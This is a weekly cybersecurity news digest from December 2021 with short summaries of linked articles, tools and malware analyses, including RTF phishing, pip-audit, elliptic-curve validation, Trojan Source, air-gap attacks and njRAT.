December 5, 2021

CyberSecNews Weekly - 0x06-W4821

News

• Hackers Increasingly Using RTF Template Injection Technique in Phishing Attacks
  Hackers have been increasingly using RTF Template Injection method in widespread phishing attacks.

• Top 5 Costly Data Breaches of 2021 and Its Impact
  From Astoria Company to Reindeer, this article discusses the biggest data breaches of 2021 where the companies paid a huge price and suffered major repercussions

Tools

• sottlmarek/DevSecOps
  A list of resources in the DevSecOps space.

• trailofbits/pip-audit
  Audits Python environments and dependency trees for known vulnerabilities

• danielmiessler/SecLists
  SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place.List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

Articles

• An Illustrated Guide to Elliptic Curve Cryptography Validation
  Elliptic Curve Cryptography (ECC) has become the de facto standard for protecting modern communications. ECC is widely used to perform asymmetric cryptography operations, such as to establish shared secrets or for digital signatures. However, insufficient validation of public keys and parameters is still a frequent cause of confusion, leading to serious vulnerabilities, such as leakage of secret keys, signature malleability or interoperability issues. The purpose of this blog post is to provide an illustrated description of the typical failures related to elliptic curve validation and how to avoid them in a clear and accessible way.

• Data Exfiltration via CSS + SVG Font
  This post will show that the SVG fonts and CSS can be used for reading the page's text contents.

• Why I have settled on XChaCha20+Blake3 as the AEAD suite of choice for my projects
  This might get me some looks, but I have pretty solidly decided to go in on using XChaCha20+Blake3 as the AEAD of choice for my future open source work. There are numerous reasons for this decision, but it mainly comes down to the desire for defense in depth, and a deep dislike of fundamental properties of polynomial MACs.

• Trojan Source and Python
  The Trojan Source vulnerabilities have been rippling through various development communities since their disclosure on November 1. The oddities that can arise when handling Unicode, and bidirectional Unicode in particular, in a programming language have led Rust, for example, to check for the problematic code points in strings and comments and, by default, refuse to compile if they are present. Python has chosen a different path, but work is underway to help inform programmers of the kinds of pitfalls that Trojan Source has highlighted.

• “Why the hell even use Deep Learning?” Twitter Thread edition
  Rich Harang (@rharang) discussion about how and when using DL in your security products.

• Understanding Zero-knowledge proofs through simple examples
  

• eset_jumping_the_air_gap_wp.pdf
  Air-gapped networks are a very common architecture in highly security or critical environemnts (like OT networks). In this white paper ESET describes several framework to attack and bypass them.

IR & Reversing

• Tracking a P2P network related to TA505
  For the past few months, NCC Group has been tracking very closely the operations of TA505 and the development of different projects (e.g. Clop) by them.

• Just another analysis of the njRAT malware – A step-by-step approach – CYBER GEEKS